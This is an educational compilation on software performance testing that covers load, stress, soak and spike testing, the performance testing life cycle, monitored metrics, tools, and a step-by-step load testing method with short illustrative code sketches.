Regression testing is considered after a bug is fixed or when any area of functionality is changed. During bug fixing, some part of the code may be changed, or functionality may be manipulated; because of this change, we have to perform regression testing.


Performance testing

• It is a type of non-functional testing.
• Performance testing is performed to determine how fast some aspect of a system performs under a particular workload.
• It can serve different purposes; for example, it can demonstrate that the system meets performance criteria.
• It can compare two systems to find which performs better, or it can measure which part of the system or workload causes the system to perform badly.
• This process can involve quantitative tests done in a lab, such as measuring the response time or the number of MIPS (millions of instructions per second) at which a system functions.

• Why do performance testing:

o Improve user experience on sites and web apps
o Increase revenue generated from websites
o Gather metrics useful for tuning the system
o Identify bottlenecks such as database configuration
o Determine if a new release is ready for production
o Provide reporting to business stakeholders regarding performance against expectations

What is Performance Testing?

Performance testing is a non-functional testing technique performed to determine system parameters in terms of responsiveness and stability under various workloads. Performance testing measures the quality attributes of the system, such as scalability, reliability and resource usage.

Performance Testing Techniques:

• Load testing - The simplest form of performance testing, conducted to understand the behavior of the system under a specific load. Load testing measures important business-critical transactions, and the load on the database, application server, etc. is also monitored.

• Stress testing - Performed to find the upper limit capacity of the system and to determine how the system performs if the current load goes well above the expected maximum.

• Soak testing - Also known as endurance testing, performed to determine the system parameters under a continuous expected load. During soak tests, parameters such as memory utilization are monitored to detect memory leaks or other performance issues. The main aim is to discover the system's performance under sustained use.

• Spike testing - Spike testing is performed by increasing the number of users suddenly by a very large amount and measuring the performance of the system. The main aim is to determine whether the system will be able to sustain the workload.

• Configuration testing

Rather than testing for performance from a load perspective, tests are created to determine the effects of configuration changes to the system's components on the system's performance and behavior. A common example would be experimenting with different methods of load-balancing.

• Isolation testing

Isolation testing is not unique to performance testing but involves repeating a test execution that resulted in a system problem. Such testing can often isolate and confirm the fault domain.

• Endurance testing - Done to make sure the software can handle the expected load over a long period of time.

• Volume testing - Under volume testing, a large amount of data is populated in the database, and the overall software system's behavior is monitored. The objective is to check the software application's performance under varying database volumes.

• Scalability testing - The objective of scalability testing is to determine the software application's effectiveness in "scaling up" to support an increase in user load. It helps plan capacity additions to your software system.

Load testing is the simplest form of performance testing. A load test is usually conducted to understand the behavior of the system under a specific expected load. This load can be the expected concurrent number of users on the application performing a specific number of transactions within the set duration. This test will give out the response times of all the important business critical transactions. If the database, application server, etc. are also monitored, then this simple test can itself point towards bottlenecks in the application software.

Stress testing is normally used to understand the upper limits of capacity within the system. This kind of test is done to determine the system's robustness in terms of extreme load and helps application administrators to determine if the system will perform sufficiently if the current load goes well above the expected maximum.

Soak testing, also known as endurance testing, is usually done to determine if the system can sustain the continuous expected load. During soak tests, memory utilization is monitored to detect potential leaks. Also important, but often overlooked, is performance degradation, i.e. ensuring that the throughput and/or response times after some long period of sustained activity are as good as or better than at the beginning of the test. It essentially involves applying a significant load to a system for an extended, significant period of time. The goal is to discover how the system behaves under sustained use.

Spike testing is done by suddenly increasing the load generated by a very large number of users, and observing the behaviour of the system. The goal is to determine whether performance will suffer, the system will fail, or it will be able to handle dramatic changes in load.


Attributes of Performance Testing:

• Speed
• Scalability
• Stability
• Reliability

Performance testing is performed to ascertain how the components of a system are performing in a given situation. Resource usage, scalability and reliability of the product are also validated under this testing. Performance testing is a subset of performance engineering, which focuses on addressing performance issues in the design and architecture of a software product.


Performance Testing Goal:

The primary goal of performance testing includes establishing the benchmark behaviour of the system. There are a number of industry-defined benchmarks, which should be met during performance testing.

Performance testing does not aim to find defects in the application; it addresses the somewhat more critical task of testing against the benchmarks and standards set for the application. Accuracy and close monitoring of the performance and of the results of the test are the primary characteristics of performance testing.

Example:

For instance, you can test the application's network performance on a connection speed vs. latency chart. Latency is the time it takes data to travel from source to destination. Per the example benchmark, a 70 KB page should take no more than 15 seconds to load over a worst-case connection, a 28.8 kbps modem (latency = 1,000 milliseconds), while a page of the same size should appear within 5 seconds over an average connection, 256 kbps DSL (latency = 100 milliseconds). A 1.5 Mbps T1 connection (latency = 50 milliseconds) would have its performance benchmark set at within 1 second.

For example, the time difference between the generation of a request and the acknowledgement of the response should be in the range of x ms to y ms (milliseconds), where x and y are standard figures. Successful performance testing should surface most of the performance issues, which could be related to the database, network, software, hardware, etc.
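A rough model behind such benchmarks is: load time is approximately latency plus page size in bits divided by bandwidth. The sketch below applies it to the figures from the example; it deliberately ignores protocol overhead, compression and rendering time, so treat the outputs as estimates rather than exact reproductions of the chart:

    # Estimate page load time as latency plus transfer time.
    def estimated_load_seconds(page_bytes, bandwidth_bps, latency_ms):
        return latency_ms / 1000 + (page_bytes * 8) / bandwidth_bps

    page = 70 * 1024  # a 70 KB page
    for name, bw, lat in [("28.8 kbps modem", 28_800, 1000),
                          ("256 kbps DSL", 256_000, 100),
                          ("1.5 Mbps T1", 1_500_000, 50)]:
        print(f"{name}: ~{estimated_load_seconds(page, bw, lat):.1f} s")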


Why performance testing

Organizations depend on software applications. They are the engine that drives their business. Applications enable customers, partners and employees to perform many diverse and business-critical transactions. So these systems must perform as expected and be accessible when needed.

In software engineering, performance testing is in general testing performed to determine how a system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage.

Performance testing is a subset of performance engineering, an emerging computer science practice which strives to build performance into the implementation, design and architecture of a system.

Performance testing is done to provide stakeholders with information about their application regarding speed, stability and scalability. More importantly, performance testing uncovers what needs to be improved before the product goes to market. Without performance testing, software is likely to suffer from issues such as running slowly while several users use it simultaneously, inconsistencies across different operating systems, and poor usability. Performance testing determines whether the software meets speed, scalability and stability requirements under expected workloads. Applications sent to market with poor performance metrics due to nonexistent or poor performance testing are likely to gain a bad reputation and fail to meet expected sales goals. Mission-critical applications, like space launch programs or life-saving medical equipment, should also be performance tested to ensure that they run for a long period of time without deviation.

What is performance testing?

Software performance testing is a means of quality assurance (QA). It involves testing software applications to ensure they will perform well under their expected workload.

The features and functionality supported by a software system are not the only concern. A software application's performance, like its response time, also matters. The goal of performance testing is not to find bugs but to eliminate performance bottlenecks.

The focus of Performance testing is checking a software program's

• Speed - Determines whether the application responds quickly.
• Scalability - Determines the maximum user load the software application can handle.
• Stability - Determines if the application is stable under varying loads.


Common Performance Problems

Most performance problems revolve around speed, response time, load time and poor scalability. Speed is often one of the most important attributes of an application. A slow running application will lose potential users. Performance testing is done to make sure an app runs fast enough to keep a user's attention and interest. Take a look at the following list of common performance problems and notice how speed is a common factor in many of them:

• Long load time - Load time is normally the initial time it takes an application to start. This should generally be kept to a minimum. While some applications cannot possibly load in under a minute, load time should be kept under a few seconds if possible.

• Poor response time - Response time is the time it takes from when a user inputs data into the application until the application outputs a response to that input. Generally this should be very quick. Again if a user has to wait too long, they lose interest.

• Poor scalability - A software product suffers from poor scalability when it cannot handle the expected number of users or when it does not accommodate a wide enough range of users. Load testing should be done to be certain the application can handle the anticipated number of users.

• Bottlenecking - Bottlenecks are obstructions in a system which degrade overall system performance. Bottlenecking occurs when either coding errors or hardware issues cause a decrease in throughput under certain loads. It is often caused by one faulty section of code. The key to fixing a bottlenecking issue is to find the section of code that is causing the slowdown and try to fix it there. Bottlenecking is generally fixed either by fixing poorly running processes or by adding additional hardware. Some common performance bottlenecks are:

o CPU utilization
o Memory utilization
o Network utilization
o Operating system limitations
o Disk usage

Performance Testing Process

The methodology adopted for performance testing can vary widely but the objective for performance tests remain the same. It can help demonstrate that your software system meets certain pre-defined performance criteria. Or it can help compare performance of two software systems. It can also help identify parts of your software system which degrade its performance.


Below is a generic performance testing process

1. Identify your testing environment - Know your physical test environment, production environment and what testing tools are available. Understand details of the hardware, software and network configurations used during testing before you begin the testing process. It will help testers create more efficient tests. It will also help identify possible challenges that testers may encounter during the performance testing procedures.

2. Identify the performance acceptance criteria - This includes goals and constraints for throughput, response times and resource allocation. It is also necessary to identify project success criteria outside of these goals and constraints. Testers should be empowered to set performance criteria and goals because often the project specifications will not include a wide enough variety of performance benchmarks. Sometimes there may be none at all. When possible finding a similar application to compare to is a good way to set performance goals.

3. Plan & design performance tests - Determine how usage is likely to vary amongst end users and identify key scenarios to test for all possible use cases. It is necessary to simulate a variety of end users, plan performance test data and outline what metrics will be gathered.

4. Configuring the test environment - Prepare the testing environment before execution. Also, arrange tools and other resources.

5. Implement test design - Create the performance tests according to your test design.

6. Run the tests - Execute and monitor the tests.
7. Analyze, tune and retest - Consolidate, analyze and share test results. Then fine-tune and test again to see if there is an improvement or decrease in performance. Since improvements generally grow smaller with each retest, stop when bottlenecking is caused by the CPU; then you may have to consider the option of increasing CPU power.

Performance Parameters Monitored

The basic parameters monitored during performance testing include:

• Processor Usage - amount of time processor spends executing non-idle threads.

• Memory use - amount of physical memory available to processes on a computer.

• Disk time - amount of time the disk is busy executing a read or write request.
• Bandwidth - shows the bits per second used by a network interface.


• Private bytes - number of bytes a process has allocated that can't be shared amongst other processes. These are used to measure memory leaks and usage.
• Committed memory - amount of virtual memory used.
• Memory pages/second - number of pages written to or read from the disk in order to resolve hard page faults. Hard page faults occur when code not from the current working set is called up from elsewhere and retrieved from disk.
• Page faults/second - the overall rate at which fault pages are processed by the processor. This again occurs when a process requires code from outside its working set.
• CPU interrupts per second - the average number of hardware interrupts a processor receives and processes each second.
• Disk queue length - the average number of read and write requests queued for the selected disk during a sample interval.
• Network output queue length - length of the output packet queue, in packets. Anything more than two means a delay, and the bottlenecking needs to be stopped.
• Network bytes total per second - the rate at which bytes are sent and received on the interface, including framing characters.
• Response time - time from when a user enters a request until the first character of the response is received.
• Throughput - the rate at which a computer or network receives requests per second.
• Amount of connection pooling - the number of user requests that are met by pooled connections. The more requests met by connections in the pool, the better the performance will be.
• Maximum active sessions - the maximum number of sessions that can be active at once.
• Hit ratios - the number of SQL statements that are handled by cached data instead of expensive I/O operations. This is a good place to start when solving bottlenecking issues.
• Hits per second - the number of hits on a web server during each second of a load test.
• Rollback segment - the amount of data that can roll back at any point in time.
• Database locks - locking of tables and databases needs to be monitored and carefully tuned.
• Top waits - monitored to determine what wait times can be cut down when dealing with how fast data is retrieved from memory.
• Thread counts - an application's health can be measured by the number of threads that are running and currently active.
• Garbage collection - returning unused memory back to the system. Garbage collection needs to be monitored for efficiency.
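Many of these counters can be sampled directly while a test runs. The sketch below uses the third-party psutil library (an assumption; commercial load-test tools collect such counters themselves) to log a few of the system-related parameters during execution:

    import psutil  # third-party: pip install psutil

    # Sample a handful of the parameters above three times, one second apart.
    for _ in range(3):
        cpu = psutil.cpu_percent(interval=1)      # processor usage, percent
        mem = psutil.virtual_memory().percent     # physical memory in use, percent
        disk = psutil.disk_io_counters()          # cumulative disk read/write counts
        net = psutil.net_io_counters()            # cumulative network byte counts
        print(f"cpu={cpu}% mem={mem}% disk_reads={disk.read_count} "
              f"net_bytes={net.bytes_sent + net.bytes_recv}")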

Performance Test Tools

There is a wide variety of performance testing tools available on the market. The tool you choose for testing will depend on many factors, such as the types of protocol supported, license cost, hardware requirements, platform support, etc. Below is a list of popularly used testing tools.


• HP LoadRunner - one of the most popular performance testing tools on the market today. This tool is capable of simulating hundreds of thousands of users, putting applications under real-life loads to determine their behavior under expected loads. LoadRunner features a virtual user generator which simulates the actions of live human users.

• HTTP Load - a throughput testing tool aimed at testing web servers by running several http or https fetches simultaneously to determine how a server handles the workload.

• Proxy Sniffer - one of the leading tools used for load testing of web and application servers. It is a cloud based tool that's capable of simulating thousands of users.

Performance testing is necessary before marketing any software product. It ensures customer satisfaction and protects an investor's investment against product failure. The costs of performance testing are usually more than made up for by improved customer satisfaction, loyalty and retention.

Benefits

• Major usability problems are identified that may not be revealed by less formal testing, including problems related to the specific skills and expectations of the users.

• Measures can be obtained for the users' effectiveness, efficiency and satisfaction.

Now we will see the phases of Performance Testing Life Cycle (PTLC).

1. Non-Functional Requirements Elicitation and Analysis
2. Performance Test Strategy
3. Performance Test Design
4. Performance Test Execution
5. Performance Test Result Analysis
6. Benchmarks and Recommendations


Non-Functional Requirements Elicitation and Analysis

Understanding the non-functional requirements is the first and most critical phase in the PTLC.

Entry Criteria

• Application Under Test (AUT) Architecture
• Non-Functional Requirement Questionnaire

Tasks

• Understanding the AUT architecture
• Identification and understanding of critical scenarios
• Understanding interface details
• Understanding the growth pattern

Exit Criteria

• Client signed-off NFR document

2. Performance Test Strategy

This phase defines how to approach performance testing for the identified critical scenarios. The following are to be addressed during this phase:

1. What kind of performance testing?
2. Performance tool selection
3. Hardware and software environment set-up

Entry Criteria


• Signed-off NFR document

Activities

• Prepare the Test Strategy and review
• Data set-up
• Defining in-scope and out-of-scope
• SLA
• Workload Model
• Prepare Risks and Mitigation and review

Exit Criteria

• Baselined Performance Test Strategy doc

3. Performance Test Design

This phase involves script generation using the identified testing tool in a dedicated environment. All script enhancements should be done and unit tested.

Entry Criteria

• Baselined Test Strategy
• Test Environment
• Test Data

Activities

• Test Scripting
• Data Parameterization
• Correlation
• Designing the actions and transactions
• Unit Testing

Exit Criteria

• Unit tested performance scripts

4. Performance Test Execution

This phase is dedicated to the test engineers, who design scenarios based on the identified workload and load the system with concurrent virtual users (VUsers).

Entry Criteria

• Baselined Test scripts


Activities

• Designing the scenarios
• Loading the test script
• Test script execution
• Monitoring the execution
• Collecting the logs

Exit Criteria

• Test script execution log files

5. Performance Test Result Analysis

The collected log files are analyzed and reviewed by experienced test engineers. Tuning recommendations are given if any conflicts are identified.

Entry Criteria

• Collected log files

Activities

• Create graphs and charts
• Correlate various graphs and charts
• Prepare a detailed test report
• Test report analysis and review
• Tuning recommendations

Exit Criteria

• Performance Analysis Report

6. Benchmark and Recommendations

This is the last phase in the PTLC; it involves benchmarking and providing recommendations to the client.

Entry Criteria

• Performance Analysis Report

Activities

• Comparing results with earlier execution results
• Comparing with the benchmark standards
• Validating against the NFRs
• Preparing the Test Report presentation

Exit Criteria

• Performance report reviewed and baselined

Setting performance goals

Performance testing can serve different purposes:

• It can demonstrate that the system meets performance criteria.
• It can compare two systems to find which performs better.
• It can measure which parts of the system or workload cause the system to perform badly.

Many performance tests are undertaken without setting sufficiently realistic, goal-oriented performance goals. The first question from a business perspective should always be, "Why are we performance-testing?". These considerations are part of the business case for the testing. Performance goals will differ depending on the system's technology and purpose, but should always include concrete targets such as those discussed earlier (response time, throughput, resource utilization and maximum user load).

Performance testing web applications

According to the Microsoft Developer Network the Performance Testing Methodology consists of the following activities:

1. Identify the Test Environment. Identify the physical test environment and the production environment as well as the tools and resources available to the test team. The physical environment includes hardware, software, and network configurations. Having a thorough understanding of the entire test environment at the outset enables more efficient test design and planning and helps you identify testing challenges early in the project. In some situations, this process must be revisited periodically throughout the project’s life cycle.

2. Identify Performance Acceptance Criteria. Identify the response time, throughput, and resource-use goals and constraints. In general, response time is a user concern, throughput is a business concern, and resource use is a system concern. Additionally, identify project success criteria that may not be captured by those goals and constraints; for example, using performance tests to evaluate which combination of configuration settings will result in the most desirable performance characteristics.

3. Plan and Design Tests. Identify key scenarios, determine variability among representative users and how to simulate that variability, define test data, and establish the metrics to be collected. Consolidate this information into one or more models of system usage to be implemented, executed, and analyzed.

4. Configure the Test Environment. Prepare the test environment, tools, and resources necessary to execute each strategy, as features and components become available for test. Ensure that the test environment is instrumented for resource monitoring as necessary.

5. Implement the Test Design. Develop the performance tests in accordance with the test design.

6. Execute the Test. Run and monitor your tests. Validate the tests, test data, and results collection. Execute validated tests for analysis while monitoring the test and the test environment.

7. Analyze Results, Tune, and Retest. Analyze, consolidate, and share results data. Make a tuning change and retest. Compare the results of both tests. Each improvement made will return a smaller gain than the previous one. When do you stop? When you reach a CPU bottleneck; the choices then are either to improve the code or to add more CPU.


load testing

What is Load Testing ?

Load testing is a performance testing technique in which the response of the system is measured under various load conditions. Load testing is performed for normal and peak load conditions.

Load Testing Approach:

• Evaluate performance acceptance criteria • Identify critical scenarios • Design workload Model • Identify the target load levels • Design the tests • Execute Tests • Analyze the Results

Objectives of Load Testing:

• Response time • Throughput • Resource utilization • Maximum user load • Business-related metrics

Load Testing

• Load testing is a type of non-functional testing.
• A load test is a type of software testing conducted to understand the behavior of the application under a specific expected load.
• Load testing is performed to determine a system’s behavior under both normal and peak conditions.
• It helps to identify the maximum operating capacity of an application as well as any bottlenecks, and to determine which element is causing degradation. For example, if the number of users is increased, how much CPU and memory will be consumed, and what are the network and bandwidth response times?
• Load testing can be done under controlled lab conditions to compare the capabilities of different systems or to accurately measure the capabilities of a single system.


• Load testing involves simulating real-life user load for the target application. It helps you determine how your application behaves when multiple users hit it simultaneously.

• Load testing differs from stress testing, which evaluates the extent to which a system keeps working when subjected to extreme workloads or when some of its hardware or software has been compromised.

• The primary goal of load testing is to define the maximum amount of work a system can handle without significant performance degradation.

• Examples of load testing include:

o Downloading a series of large files from the internet.
o Running multiple applications on a computer or server simultaneously.
o Assigning many jobs to a printer in a queue.
o Subjecting a server to a large amount of traffic.
o Writing and reading data to and from a hard disk continuously.

Load testing is meant to test the system by constantly and steadily increasing the load on the system until it reaches the threshold limit. It is the simplest form of testing, which employs automation tools such as LoadRunner or other good tools that are available. Load testing is also known by names like volume testing and endurance testing.

The sole purpose of load testing is to assign the system the largest job it could possibly handle, to test its endurance, and to monitor the results. An interesting fact is that sometimes the system is fed an empty task, to determine the behaviour of the system in a zero-load situation.

Load Testing Goal:

The goals of load testing are to expose the defects in an application related to buffer overflows, memory leaks and mismanagement of memory. Another target of load testing is to determine the upper limit of all the components of the application, like the database, hardware, network, etc., so that it can manage the anticipated load in the future. The issues that eventually come out as the result of load testing may include load balancing problems, bandwidth issues, the capacity of the existing system, etc.

Example:

For example, to check the email functionality of an application, it could be flooded with 1000 users at a time. Now, 1000 users can fire the email transactions (read, send, delete, forward, reply) in many different ways. If we take one transaction per user per hour, then it would be 1000 transactions per hour. By simulating 10 transactions/user, we could load test the email server by occupying it with 10000 transactions/hour.
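In the spirit of that example, a toy load generator can simulate concurrent user sessions with a thread pool. The transaction body below is a stub standing in for the mail operations; a real test would call the server's API and record the response times:

    import random
    import time
    from concurrent.futures import ThreadPoolExecutor

    def user_session(user_id, transactions=10):
        timings = []
        for _ in range(transactions):
            start = time.perf_counter()
            time.sleep(random.uniform(0.01, 0.05))  # stub for send/read/delete/etc.
            timings.append(time.perf_counter() - start)
        return sum(timings) / len(timings)

    # 1000 simulated users x 10 transactions each = 10,000 transactions in
    # total, driven by 100 concurrent workers.
    with ThreadPoolExecutor(max_workers=100) as pool:
        averages = list(pool.map(user_session, range(1000)))
    print(f"mean transaction time: {sum(averages) / len(averages):.3f} s")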


Load testing is the process of putting demand on a system or device and measuring its response. Load testing is performed to determine a system’s behavior under both normal and anticipated peak load conditions. It helps to identify the maximum operating capacity of an application as well as any bottlenecks and determine which element is causing degradation. When the load placed on the system is raised beyond normal usage patterns, in order to test the system's response at unusually high or peak loads, it is known as stress testing. The load is usually so great that error conditions are the expected result, although no clear boundary exists when an activity ceases to be a load test and becomes a stress test.


Approach for Load Testing

The following steps are involved in load-testing a Web application:

1. Step 1 - Identify performance acceptance criteria
2. Step 2 - Identify key scenarios
3. Step 3 - Create a workload model
4. Step 4 - Identify the target load levels
5. Step 5 - Identify metrics
6. Step 6 - Design specific tests
7. Step 7 - Run tests
8. Step 8 - Analyze the results

These steps are graphically represented below. The sections that follow discuss each step in detail.


Figure 17.1 Load Testing Steps

Step 1 - Identify Performance Acceptance Criteria

Identifying performance acceptance criteria is most valuable when initiated early in the application’s development life cycle. It is frequently valuable to record the acceptance criteria for your application and store them in a place and format that is available to the entire team for review and comment. Criteria are typically determined by balancing your business, industry, technology, competitive, and user requirements.

Test objectives frequently include the following:

• Response time. For example, the product catalog must be displayed in less than 3 seconds.

• Throughput. For example, the system must support 100 transactions per second.


• Resource utilization. A frequently overlooked aspect is the amount of resources your application is consuming, in terms of processor, memory, disk input output (I/O), and network I/O.

• Maximum user load. This test objective determines how many users can run on a specific hardware configuration.

• Business related metrics. This objective is mapped to business volume at normal and peak values; for example, the number of orders or Help desk calls handled at a given time.
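A single acceptance criterion of this kind can be checked with very little code. The sketch below times one request against the 3-second catalog criterion from the list above; the URL is a placeholder standing in for the catalog page:

    import time
    import urllib.request

    MAX_RESPONSE_SECONDS = 3.0  # acceptance criterion from the example above

    start = time.perf_counter()
    with urllib.request.urlopen("https://example.com/") as response:  # placeholder URL
        response.read()
    elapsed = time.perf_counter() - start

    assert elapsed < MAX_RESPONSE_SECONDS, f"catalog page took {elapsed:.2f} s"
    print(f"catalog page displayed in {elapsed:.2f} s")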

Step 2 - Identify Key Scenarios

Scenarios are anticipated user paths that generally incorporate multiple application activities. Key scenarios are those for which you have specific performance goals, those considered to be high-risk, those that are most commonly used, or those with a significant performance impact. The basic steps for identifying key scenarios are:

1. Identify all the scenarios for a Web application. For example, even the most basic e-commerce application must support the following user scenarios:

o Browse catalog
o Search for a product
o Place an order

2. Identify the activities involved in each of the scenarios. For example, a “Place an Order” scenario will include the following activities:

o Log on to the application.
o Browse the product catalog.
o Search for a specific product.
o Add items to the shopping cart.
o Validate credit card details and place an order.

3. Identify the scenarios that are most commonly executed or most resource-intensive; these will be the key scenarios used for load testing. For example, in an e-commerce application, browsing a catalog may be the most commonly executed scenario, whereas placing an order may be the most resource-intensive scenario because it accesses the database.

o The most commonly executed scenarios for an existing Web application can be determined by examining the log files.
o The most commonly executed scenarios for a new Web application can be obtained from market research, historical data, market trends, and so on.
o Resource-intensive scenarios can be identified by using design documents or the actual code implementation. The primary resources are: processor, memory, disk I/O, and network I/O.

Once they have been identified, you will use these key scenarios to create workload profiles and to design load tests.

Step 3 - Create a Workload Model

When defining workload distribution, consider the following key points for determining the characteristics for user scenarios:

• A user scenario is defined as a navigational path, including intermediate steps or activities, taken by the user to complete a task. This can also be thought of as a user session.

• A user will typically pause between pages during a session. This is known as user delay or think time.

• A session will have an average duration when viewed across multiple users. It is important to account for this when defining the load levels that will translate into concurrent usage, overlapping users, or user sessions per unit of time.

• Not all scenarios can be performed by a new user, a returning user, or either; know who you expect your primary users to be and test accordingly.
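These characteristics can be folded into a very small session model. In the sketch below, the page set, the per-page response times, and the think-time range are illustrative assumptions, used only to show how think time dominates session duration:

    import random

    # One simulated user session: a navigational path with think time between pages.
    def session_duration(pages=("home", "catalog", "checkout")):
        total = 0.0
        for _ in pages:
            total += random.uniform(0.2, 1.0)   # assumed page response time (s)
            total += random.uniform(5.0, 15.0)  # assumed user think time (s)
        return total

    durations = [session_duration() for _ in range(1000)]
    print(f"average session duration: {sum(durations) / len(durations):.1f} s")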

Step 4 - Identify Target Load Levels

Identify the load levels to be applied to the workload distribution(s) identified during the previous step. The purpose of identifying target load levels is to ensure that your tests can be used to predict or compare a variety of production load conditions. The following are common inputs used for determining target load levels:

• Business volume (both current and projected) as it relates to your performance objectives

• Key scenarios
• Distribution of work
• Session characteristics (navigational path, duration, percentage of new users)

By combining the items above, you can determine the remaining details necessary to implement the workload model under a particular target load.

Step 5 - Identify Metrics

There is a virtually unlimited number of metrics that can be collected during a performance test execution. However, collecting too many metrics can make analysis unwieldy as well as negatively impact the application’s actual performance. For these reasons, it is important to identify the metrics that are most relevant to your performance objectives and those that you anticipate will help you to identify bottlenecks. Only well-selected metrics that are analyzed correctly and contextually provide information of value.

The following are a few suggestions for identifying the metrics that will provide the most valuable information to your project:

• Define questions related to your application performance that can be easily tested. For example, what is the checkout response time when placing an order? How many orders are placed in a minute? These questions have definite answers.

• With the answers to these questions, determine quality goals for comparison against external expectations. For example, checkout response time should be 30 seconds, and a maximum of 10 orders should be placed in a minute. The answers are based on market research, historical data, market trends, and so on.

• Identify the metrics. Using your list of performance-related questions and answers, identify the metrics that provide information related to those questions and answers.

• Identify supporting metrics. Using the same approach, you can identify lower-level metrics that focus on measuring the performance and identifying the bottlenecks in the system. When identifying low-level metrics, most teams find it valuable to determine a baseline for those metrics under single-user and/or normal load conditions. This helps you determine the acceptable load levels for your application. Baseline values help you analyze your application performance at varying load levels and serve as a starting point for trend analysis across builds or releases.

• Reevaluate the metrics to be collected regularly. Goals, priorities, risks, and current issues are bound to change over the course of a project. With each of these changes, different metrics may provide more value than the ones that have previously been identified.

Additionally, to evaluate the performance of your application in more detail and to identify potential bottlenecks, it is frequently useful to monitor metrics in the following categories:

• Network-specific metrics. This set of metrics provides information about the overall health and efficiency of your network, including routers, switches, and gateways.

• System-related metrics. This set of metrics helps you identify the resource utilization on your server. The resources being utilized are processor, memory, disk I/O, and network I/O.

• Platform-specific metrics. Platform-specific metrics are related to software that is used to host your application, such as the Microsoft .NET Framework common language runtime (CLR) and ASP.NET-related metrics.

• Application-specific metrics. These include custom performance counters inserted in your application code to monitor application health and identify performance issues. You might use custom counters to determine the number of concurrent threads waiting to acquire a particular lock, or the number of requests queued to make an outbound call to a Web service (a minimal counter sketch follows this list).

• Service-level metrics. These metrics can help to measure overall application throughput and latency, or they might be tied to specific business scenarios.

• Business metrics. These metrics are indicators of business-related information, such as the number of orders placed in a given timeframe.
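As an illustration of the application-specific category, the sketch below shows one way a custom counter might be embedded in application code to track requests queued for an outbound call. The class and its use are hypothetical, not the counter API of any particular platform:

import threading

class QueueDepthCounter:
    """Hypothetical custom counter: tracks requests currently queued
    to make an outbound call (for example, to a Web service)."""

    def __init__(self):
        self._lock = threading.Lock()
        self._depth = 0
        self._peak = 0

    def enqueue(self):
        with self._lock:
            self._depth += 1
            self._peak = max(self._peak, self._depth)

    def dequeue(self):
        with self._lock:
            self._depth -= 1

    def snapshot(self):
        with self._lock:
            return {"current_depth": self._depth, "peak_depth": self._peak}

# A monitoring loop would periodically publish snapshot() alongside the
# system- and platform-level metrics collected by the test harness.
counter = QueueDepthCounter()
counter.enqueue()
print(counter.snapshot())  # {'current_depth': 1, 'peak_depth': 1}
counter.dequeue()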

Step 6 - Design Specific Tests

Using your scenarios, key metrics, and workload analysis, you can now design specific tests to be conducted. Each test will generally have a different purpose, collect different data, include different scenarios, and have different target load levels. The key is to design tests that will help the team collect the information it needs in order to understand, evaluate, or tune the application.

Points to consider when designing tests include:

• Do not change your test design because the design is difficult to implement in your tool.

• If you cannot implement your test as designed, ensure that you record the details pertaining to the test that you do implement.

• Ensure that the model contains all of the supplementary data needed to create the actual test.

• Consider including invalid data in your performance tests (captured in the design sketch after this list). For example, include some users who mistype their password on the first attempt but get it correct on a second try.

• First-time users usually spend significantly more time on each page or activity than experienced users.

• The best possible test data is test data collected from a production database or log file.

• Think about nonhuman system users and batch processes as well as end users. For example, there might be a batch process that runs to update the status of orders while users are performing activities on the site. In this situation, you would need to account for those processes because they might be consuming resources.

• Do not get overly caught up in striving for perfection, and do not fall into the trap of oversimplification. In general, it is a good idea to start executing tests when you have a reasonable test designed and then enhance the design incrementally while collecting results.
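To show how such design points might be captured, the following sketch encodes a test design as plain data, including the invalid-data idea from the list (a fraction of users who mistype their password on the first attempt). All names and numbers are hypothetical:

# Hypothetical test design captured as data, so the implemented test can be
# checked against the design and any deviations recorded.
test_design = {
    "name": "normal_load_order_placement",
    "target_load_users": 500,          # assumed target load level
    "scenarios": {
        "browse_and_order": 0.70,      # share of virtual users per scenario
        "search_only": 0.30,
    },
    # Invalid data: some users mistype their password on the first
    # attempt and get it correct on the second try.
    "login_first_attempt_failure_rate": 0.05,
    # Nonhuman system users running alongside end users.
    "batch_processes": ["order_status_update"],
    "data_source": "production log sample",  # the best possible test data
}

# Sanity check: scenario shares must account for the whole user population.
assert abs(sum(test_design["scenarios"].values()) - 1.0) < 1e-9
print(test_design["name"], "targets", test_design["target_load_users"], "users")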

Step 7 - Run Tests

Poor load simulations can render all of the work in the previous activities useless. To understand the data collected from a test execution, the load simulation must reflect the test design. When the simulation does not reflect the test design, the results are prone to misinterpretation. Consider the following steps when preparing to simulate load:

1. Configure the test environment in such a way that it mirrors your production environment as closely as possible, noting and accounting for all differences between the two.

2. Ensure that performance counters relevant for identified metrics and resource utilization are being measured and are not interfering with the accuracy of the simulation.

3. Use appropriate load-generation tools to create a load with the characteristics specified in your test design.

4. Using the load-generation tool(s), execute tests by first building up to the target load specified in your test design, in order to validate the correctness of the simulation. Some things to consider during test execution include:

o Begin load testing with a small number of users distributed against your user profile, and then incrementally increase the load (a minimal ramp-up sketch follows the note below). It is important to allow time for the system to stabilize between increases in load while evaluating the correctness of the simulation.

o Consider continuing to increase the load and record the behavior until you reach the threshold for the resources identified in your performance objectives, even if that load is beyond the target load specified in the test design. Information about when the system crosses identified thresholds is just as important as the value of the metrics at the target load of the test.

o Similarly, it is frequently valuable to continue to increase the number of users until you run up against the service-level limits beyond which you would be violating your SLAs for throughput, response time, and resource utilization.

Note: Make sure that the client computers (agents) you use to generate load are not overly stressed. Resource utilization such as processor and memory must remain well below the utilization threshold values to ensure accurate test results.
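A minimal sketch of the incremental ramp-up described above; the user counts, the stabilization pause, and the resource threshold are assumed values, and run_load_step is a hypothetical stand-in for whatever your load-generation tool actually invokes:

import time

def run_load_step(users):
    """Hypothetical hook that drives the load-generation tool at the given
    user count and returns observed metrics (stub values here)."""
    print(f"applying load: {users} users")
    return {"avg_response_s": 0.5, "cpu_percent": 40}

# Assumed ramp parameters: begin small, increase incrementally, and
# pause between steps so the system can stabilize.
start_users, step, target_users = 50, 50, 500
stabilization_pause_s = 60

users = start_users
while users <= target_users:
    metrics = run_load_step(users)
    # Recording where thresholds are crossed is as important as the
    # metric values at the target load itself.
    if metrics["cpu_percent"] > 75:  # assumed resource threshold
        print(f"threshold crossed at {users} users")
    time.sleep(stabilization_pause_s)
    users += step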

Step 8 - Analyze the Results

You can analyze the test results to find performance bottlenecks between each test run or after all testing has been completed. Analyzing the results correctly requires training and experience with graphing correlated response time and system data.

The following are the steps for analyzing the data:

1. Analyze the captured data and compare the results against the metric’s accepted level to determine whether the performance of the application being tested shows a trend toward or away from the performance objectives.

